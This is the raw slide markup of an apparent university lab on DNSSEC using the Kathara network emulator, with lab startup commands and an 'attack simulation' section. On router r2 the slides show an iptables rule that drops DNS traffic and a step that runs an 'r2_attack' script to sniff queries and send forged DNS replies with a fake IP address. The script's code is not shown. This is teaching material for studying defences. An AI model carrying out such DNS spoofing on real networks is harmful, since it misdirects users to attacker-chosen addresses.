              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="171" y="3294"/>
              <a:ext cx="3969"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a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1600" b="1" dirty="0" err="1">
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dnsuni</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/bind/db.uniroma3</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7303865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215A3-7BE9-3974-5190-9C14A123BABA}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18436" name="Rectangle 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F7D9D36-AFE3-4744-40C4-FE458A80A7C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>tart the lab</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18437" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{018A78BA-BD69-AFE3-8250-C939269F62AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>start the lab</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:endParaRPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr eaLnBrk="1" hangingPunct="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2800" noProof="0" dirty="0"/>
              <a:t>open any browser on the host machine </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" b="1" noProof="0" dirty="0"/>
              <a:t>localhost:3001 </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="35" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{540505A9-565C-2F4A-2213-466D6DA42880}"/>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D0B136C0-EAA0-92F9-0472-9B4AAF831E17}"/>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31" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{662ED0A0-C080-B250-FCEE-C5C3C1ECF584}"/>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8B6C54B1-596A-420D-BE3E-624301D1AB7D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2668294"/>
              <a:ext cx="10972799"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dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>cd </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>user@localhost</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:~/</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara-dnssec</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>$ </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>kathara</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>lstart</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="33" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DEE96BD1-C4D2-6E23-90BD-DCBD223DA445}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="607480" y="2378845"/>
              <a:ext cx="10972800" cy="2894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82D85723-4E68-7E61-83A1-0BA5E38655B0}"/>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D81260EE-72B0-A213-27C8-009559942357}"/>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8" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7C60B490-F811-7FCA-2814-F665B2F860E2}"/>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7">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{31782F88-E9AB-9E80-EB1F-5666A95DA49D}"/>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3944319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D0C32-222E-BD15-DA42-B9489FBF8A7D}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5122" name="Rectangle 60">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A5CC85EC-F036-F8BF-4A25-5FA6D54B8DE5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack simulation with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and redundancy</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{034F9E9A-3436-B2A8-9130-1AF7112E458C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA0ACA4F-0F0E-2CD3-157F-BECE59EE6F09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A31954C4-2A95-899D-7347-1FF159FBF46E}"/>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25596062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B6AEC-BD7E-AB9C-3CDC-A960BFD8486F}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5C42B1A9-3BA0-C670-92C6-37E375E6E65D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iptables command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A60ABFF6-796E-780B-93EC-2E6983413C91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>block incoming DNS traffic in r2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>look at eth and loopback interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E6708D92-9940-DA73-5FE6-D701B5DA3B4D}"/>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9D151712-9266-4D21-E499-04474F090491}"/>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7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E31954C7-AB54-3C75-AD83-99C55420048C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2223422" y="3133725"/>
            <a:ext cx="7745155" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1FC3AEA3-F2B4-BF16-D4D7-ACE97AFCCC46}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="257206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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F6D912BC-4E60-625F-B7C2-EB0AAFBC3BDB}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506"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r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B916521D-2F00-F47C-4AA3-1AA8D1D746FA}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{841211DD-D84A-2766-2E7B-E75437A7235F}"/>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2" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B514CD50-97B5-7687-571D-60EEB5A3E4A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3" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{499E10C7-48E3-F95F-C83D-6E9B69ECBAC0}"/>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36436453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4C08A-8D84-70F4-D183-525C5A22FA3E}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3E477792-AE3E-C5AB-E484-A256948A5B74}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run Python script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{14BCBD05-044F-3368-4F3B-401D15344ABD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run the r2_attack script to sniff the traffic and then send the packet with the fake IP address to the client who made the query.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{92662677-EAE1-8A17-37E6-891BE14F3CD4}"/>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4506762A-7896-DD2A-9A69-D6DDB316494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5" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89FDFA2D-DDDA-B915-AD91-2BA5B1467D7B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1832189" y="3464424"/>
            <a:ext cx="8527621" cy="2683937"/>
            <a:chOff x="4868024" y="2378845"/>
            <a:chExt cx="6736490" cy="2064838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D76ECF2-BF4D-D748-B04B-D8F8B6084DB4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868025" y="2659116"/>
              <a:ext cx="6736489" cy="1784567"/>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sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
